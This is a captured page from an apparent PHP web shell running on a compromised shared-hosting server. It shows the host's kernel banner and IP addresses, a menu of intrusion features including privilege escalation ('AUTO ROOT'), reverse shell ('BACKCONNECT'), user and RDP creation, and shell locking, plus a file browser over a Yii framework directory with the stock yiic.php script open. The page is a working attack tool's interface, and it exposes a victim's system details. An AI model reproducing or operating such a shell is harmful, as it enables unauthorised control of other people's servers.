Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.217.99
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
framework /
[ HOME SHELL ]
Name
Size
Permission
Action
base
[ DIR ]
drwx---r-x
caching
[ DIR ]
drwx---r-x
cli
[ DIR ]
drwx---r-x
collections
[ DIR ]
drwx---r-x
console
[ DIR ]
drwx---r-x
db
[ DIR ]
drwx---r-x
gii
[ DIR ]
drwx---r-x
i18n
[ DIR ]
drwx---r-x
logging
[ DIR ]
drwx---r-x
messages
[ DIR ]
drwx---r-x
test
[ DIR ]
drwx---r-x
utils
[ DIR ]
drwx---r-x
validators
[ DIR ]
drwx---r-x
vendors
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
web
[ DIR ]
drwx---r-x
zii
[ DIR ]
drwx---r-x
.htaccess
14
B
-rw----r--
YiiBase.php
33.99
KB
-rw----r--
radio.php
514
B
-rw----r--
radio.txt
40
B
-rw----r--
yii-powered.png
175
B
-rw----r--
yii.php
638
B
-rw----r--
yiic
358
B
-rw----r--
yiic.bat
577
B
-rw----r--
yiic.php
834
B
-rw----r--
yiilite.php
297.75
KB
-rw----r--
yiit.php
694
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yiic.php
<?php /** * Yii command line script file. * * This script is meant to be run on command line to execute * one of the pre-defined console commands. * * @author Qiang Xue <qiang.xue@gmail.com> * @link http://www.yiiframework.com/ * @copyright 2008-2013 Yii Software LLC * @license http://www.yiiframework.com/license/ */ // fix for fcgi defined('STDIN') or define('STDIN', fopen('php://stdin', 'r')); defined('YII_DEBUG') or define('YII_DEBUG',true); require_once(dirname(__FILE__).'/yii.php'); if(isset($config)) { $app=Yii::createConsoleApplication($config); $app->commandRunner->addCommands(YII_PATH.'/cli/commands'); } else $app=Yii::createConsoleApplication(array('basePath'=>dirname(__FILE__).'/cli')); $env=@getenv('YII_CONSOLE_COMMANDS'); if(!empty($env)) $app->commandRunner->addCommands($env); $app->run();
Close